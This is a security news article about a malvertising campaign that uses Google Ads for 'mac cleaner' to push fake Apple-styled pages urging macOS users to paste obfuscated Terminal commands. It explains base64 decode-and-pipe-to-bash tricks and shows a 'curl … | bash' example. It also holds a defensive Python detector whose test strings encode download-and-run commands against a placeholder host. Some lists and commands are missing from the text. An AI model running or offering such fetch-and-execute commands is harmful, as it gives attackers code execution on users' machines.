Cybercriminals have hijacked Google Search Ads for “mac cleaner” queries, tricking macOS users into visiting fake sites that mimic Apple’s design.
These sponsored results promise quick storage fixes but deliver remote code execution (RCE) payloads.
Security researchers exposed the scheme, revealing obfuscated commands that download and run malware silently. Google Ads accounts, possibly compromised, fuel the abuse.
The scam starts innocently. Users searching for “mac cleaner” see top sponsored links from seemingly legit advertisers like “Nathaniel Josue Rodriguez” or “Aloha Shirt Shop.”
Clicks lead to Google Apps Script pages (script.google.com/macros) styled like Apple’s site, complete with non-functional navigation menus.
Fake instructions urge users to “check storage” or “free up disk space” via Terminal commands. Researchers warn: Do not run them.
One malicious page pushes this command chain:
The echo 'Cleaning macOS Storage…' line distracts users, mimicking routine maintenance. The real threat hides in the Base64-encoded string that follows it.
base64 -D decodes that string into a shell command that fetches and executes a remote script with the user's permissions. No actual cleaning occurs; it's pure social engineering for RCE.
A second page uses a more stealthy approach:
Here, $(...) substitutes command output. It decodes a hidden URL, then curl -fsSL silently downloads it (-f fails quietly on HTTP errors, -s suppresses progress output, -S still prints errors despite -s, -L follows redirects) and pipes the script to bash for immediate execution.
This equals curl https://suspicious-site.com/script.sh | bash but obfuscated to evade detection.
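As an added defensive example (not code from the article or from the researchers it cites), this Python checks a pasted Terminal command for the pattern described above: it base64-decodes any long token in the command and reports whether the hidden text is itself a download-and-run command. The sample commands and the example.invalid URL are constructed placeholders, not indicators from the campaign.

```python
import base64
import re

# Long base64-looking runs; a hidden command or URL needs at least this much (heuristic).
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

# Indicators of decode-and-run or download-and-run behaviour, on visible or decoded text.
EXEC_PATTERNS = [
    (re.compile(r"\bbase64\s+(-D|-d|--decode)\b"), "base64 decode"),
    (re.compile(r"\|\s*(ba|z)?sh\b"), "pipe to shell"),
    (re.compile(r"\bcurl\b[^|]*\s-[A-Za-z]*s"), "silent curl"),
    (re.compile(r"\$\([^)]*base64[^)]*\)"), "command substitution over base64"),
    (re.compile(r"https?://"), "embedded URL"),
]

def decode_blobs(cmd):
    """Base64-decode each long token in cmd; keep only results that are readable text."""
    found = []
    for tok in B64_TOKEN.findall(cmd):
        try:
            text = base64.b64decode(tok, validate=True).decode("utf-8")
        except ValueError:  # not valid base64 or not UTF-8: just an ordinary long word
            continue
        if all(c.isprintable() or c.isspace() for c in text):
            found.append(text.strip())
    return found

def analyze_command(cmd):
    """Report what a pasted Terminal command would do, including what its base64 hides."""
    findings = {label for pat, label in EXEC_PATTERNS if pat.search(cmd)}
    decoded = decode_blobs(cmd)
    for text in decoded:
        findings.update("decoded: " + label for pat, label in EXEC_PATTERNS if pat.search(text))
    # The article's pattern: something hidden in base64 that, once decoded, is run or fetched.
    runs_hidden = "base64 decode" in findings and (
        "pipe to shell" in findings or "command substitution over base64" in findings)
    suspicious = runs_hidden and any(f.startswith("decoded:") for f in findings)
    return {"decoded": decoded, "findings": sorted(findings), "suspicious": suspicious}

# Constructed samples in the shape the article describes; the URL is a non-routable placeholder.
HIDDEN_CMD = base64.b64encode(b"curl -fsSL https://example.invalid/cleaner.sh | bash").decode()
FAKE_CLEANER = "echo 'Cleaning macOS Storage...'; echo " + HIDDEN_CMD + " | base64 -D | bash"
HIDDEN_URL = base64.b64encode(b"https://example.invalid/cleaner.sh").decode()
FAKE_SUBST = 'curl -fsSL "$(echo ' + HIDDEN_URL + ' | base64 -D)" | bash'
BENIGN = "du -sh ~/Library/Caches"

if __name__ == "__main__":
    for cmd in (FAKE_CLEANER, FAKE_SUBST, BENIGN):
        print(analyze_command(cmd))
```

The same check can be run over shell history or over process command lines collected by endpoint tooling; a hit on "suspicious" is the decode-then-execute shape, not proof of malice on its own.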
These payloads grant attackers full shell access. Downloaded scripts could:
Silent flags ensure no pop-ups alert victims. This tactic mirrors common vectors like fake GitHub READMEs, malware installers, and supply chain attacks.
macOS’s user-level execution limits root damage but still risks data theft and persistence via user-writable paths.
According to MacKeeper, researchers confirmed the ads redirect from trusted-looking domains, such as docs.google.com previews, to these scripts. No CVE is involved; the attack exploits user trust in Google and Apple branding.
Advertiser profiles raise red flags. “Nathaniel Josue Rodriguez” (Google Transparency ID: AR03742598973764927489) runs benign ads elsewhere.
“Aloha Shirt Shop” (AR00152784596742701057) shows one suspicious entry. Hacked accounts likely explain the breach; verified advertisers get prime ad placement, amplifying reach.
This malvertising wave targets macOS users seeking disk cleanup amid growing storage needs. Similar scams hit Windows “PC optimizers” before.
© Copyright 2024 – Cyber Press